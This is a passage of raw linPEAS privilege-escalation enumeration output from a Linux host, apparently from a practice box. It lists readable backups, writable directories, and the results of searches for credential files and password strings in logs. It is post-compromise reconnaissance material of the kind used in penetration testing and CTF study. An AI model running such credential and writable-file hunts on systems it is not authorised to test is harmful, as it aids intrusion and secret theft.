╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 wizard wizard 63442 Oct 25 20:01 /tmp/lp
-rwxr-xr-x 1 wizard wizard 827827 Oct 23 04:55 /tmp/linpeas.sh
-rw-r--r-- 1 root root 139 Mar 16  2022 /var/backups/dpkg.diversions.4.gz
-rw-r--r-- 1 root root 4430 Mar 23  2022 /var/backups/apt.extended_states.6.gz
-rw-r--r-- 1 root root 139 Mar 16  2022 /var/backups/dpkg.diversions.2.gz
-rw-r--r-- 1 root root 175380 Mar 19  2022 /var/backups/dpkg.status.3.gz
-rw-r--r-- 1 root root 4486 Mar 26  2022 /var/backups/apt.extended_states.5.gz
-rw-r--r-- 1 root root 175380 Mar 19  2022 /var/backups/dpkg.status.5.gz
-rw-r--r-- 1 root root 120 Feb 23  2022 /var/backups/dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 120 Feb 23  2022 /var/backups/dpkg.statoverride.4.gz
-rw-r--r-- 1 root root 37662 Oct  3 22:41 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 4465 Mar 26  2022 /var/backups/apt.extended_states.4.gz
-rw-r--r-- 1 root root 177395 Mar 31  2022 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 100 Feb 23  2022 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 4503 Sep 15 07:00 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 139 Mar 16  2022 /var/backups/dpkg.diversions.5.gz
-rw-r--r-- 1 root root 120 Feb 23  2022 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 695166 Mar 31  2022 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 268 Mar 16  2022 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 139 Mar 16  2022 /var/backups/dpkg.diversions.6.gz
-rw-r--r-- 1 root root 175380 Mar 19  2022 /var/backups/dpkg.status.4.gz
-rw-r--r-- 1 root root 4486 Sep 16 11:37 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 120 Feb 23  2022 /var/backups/dpkg.statoverride.6.gz
-rw-r--r-- 1 root root 4482 Mar 31  2022 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root root 40960 Mar 17  2022 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 177411 Mar 31  2022 /var/backups/dpkg.status.2.gz
-rw-r--r-- 1 root root 120 Feb 23  2022 /var/backups/dpkg.statoverride.5.gz
-rw-r--r-- 1 root root 139 Mar 16  2022 /var/backups/dpkg.diversions.3.gz
-rw-r--r-- 1 root root 139 Mar 16  2022 /var/backups/dpkg.diversions.1.gz
-rw-r--r-- 1 root root 120 Feb 23  2022 /var/backups/dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 162372 Mar 16  2022 /var/backups/dpkg.status.6.gz

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/wizard
/run/lock
/run/screen
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/lp
/tmp/.Test-unix
#)You_can_write_even_more_files_inside_last_directory

/var/crash
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files

╔══════════╣ Searching passwords in history files
      @stats   = stats
      @items   = { _seq_: 1  }
      @threads = { _seq_: "A" }

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)[3mThere are more creds/passwds files in the previous parent folder[0m

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/ruby/2.7.0/bundler/uri_credentials_filter.rb
/usr/lib/systemd/systemd-reply-password
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)[3mThere are more creds/passwds files in the previous parent folder[0m

/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-store.1.gz
  #)[3mThere are more creds/passwds files in the previous parent folder[0m

/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)[3mThere are more creds/passwds files in the previous parent folder[0m

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords
/var/lib/fwupd/pki/secret.key
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
2022-03-16 21:31:43,345 - util.py[DEBUG]: Writing to /var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords - wb: [644] 25 bytes
2022-03-16 21:31:43,346 - ssh_util.py[DEBUG]: line 124: option PasswordAuthentication added with yes
2022-03-16 21:31:45,946 - cc_set_passwords.py[DEBUG]: Restarted the SSH daemon.
2022-03-16 21:31:45,947 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords ran successfully
2022-03-16 21:42:48,304 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-16 21:42:48,304 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-16 22:03:15,257 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-16 22:03:15,257 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-16 22:10:34,853 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-16 22:10:34,854 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-17 20:49:25,667 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-17 20:49:25,667 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-19 15:04:28,260 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-19 15:04:28,260 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-19 18:41:52,372 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-19 18:41:52,373 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-22 23:46:35,703 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-22 23:46:35,703 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-23 07:09:02,536 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-23 07:09:02,536 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-26 11:32:01,704 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-26 11:32:01,704 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-26 13:10:25,711 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-26 13:10:25,711 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-26 13:16:39,527 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-26 13:16:39,527 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-26 13:17:11,811 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-26 13:17:11,811 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-26 13:18:01,136 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-26 13:18:01,136 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-26 14:16:38,657 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-26 14:16:38,657 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-30 17:37:26,175 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-30 17:37:26,175 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-30 17:53:24,069 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-03-30 17:53:24,070 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-31 18:27:40,270 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-03-31 18:27:40,270 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-09-14 11:10:38,252 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-09-14 11:10:38,252 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-09-15 12:31:14,495 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-09-15 12:31:14,495 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-09-15 12:38:20,635 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-09-15 12:38:20,635 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-09-16 11:31:41,738 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-09-16 11:31:41,738 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2022-09-16 14:53:53 configure passwd:amd64 1:4.8.1-1ubuntu5.20.04.2 <none>
2022-09-16 14:53:53 status half-configured passwd:amd64 1:4.8.1-1ubuntu5.20.04.1
2022-09-16 14:53:53 status half-configured passwd:amd64 1:4.8.1-1ubuntu5.20.04.2
2022-09-16 14:53:53 status half-installed passwd:amd64 1:4.8.1-1ubuntu5.20.04.1
2022-09-16 14:53:53 status installed passwd:amd64 1:4.8.1-1ubuntu5.20.04.2
2022-09-16 14:53:53 status unpacked passwd:amd64 1:4.8.1-1ubuntu5.20.04.1
2022-09-16 14:53:53 status unpacked passwd:amd64 1:4.8.1-1ubuntu5.20.04.2
2022-09-16 14:53:53 upgrade passwd:amd64 1:4.8.1-1ubuntu5.20.04.1 1:4.8.1-1ubuntu5.20.04.2
[    3.047356] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[    3.635937] systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
[    3.636530] systemd[1]: Condition check resulted in Forward Password Requests to Plymouth Directory Watch being skipped.
[    3.874074] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
 base-passwd depends on libc6 (>= 2.8); however:
 base-passwd depends on libdebconfclient0 (>= 0.145); however:
dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
Preparing to unpack .../base-passwd_3.5.47_amd64.deb ...
Preparing to unpack .../passwd_1%3a4.8.1-1ubuntu5_amd64.deb ...
Selecting previously unselected package base-passwd.
Selecting previously unselected package passwd.
Setting up base-passwd (3.5.47) ...
Setting up passwd (1:4.8.1-1ubuntu5) ...
Shadow passwords are now on.
Unpacking base-passwd (3.5.47) ...
Unpacking base-passwd (3.5.47) over (3.5.47) ...



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                                ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r' 


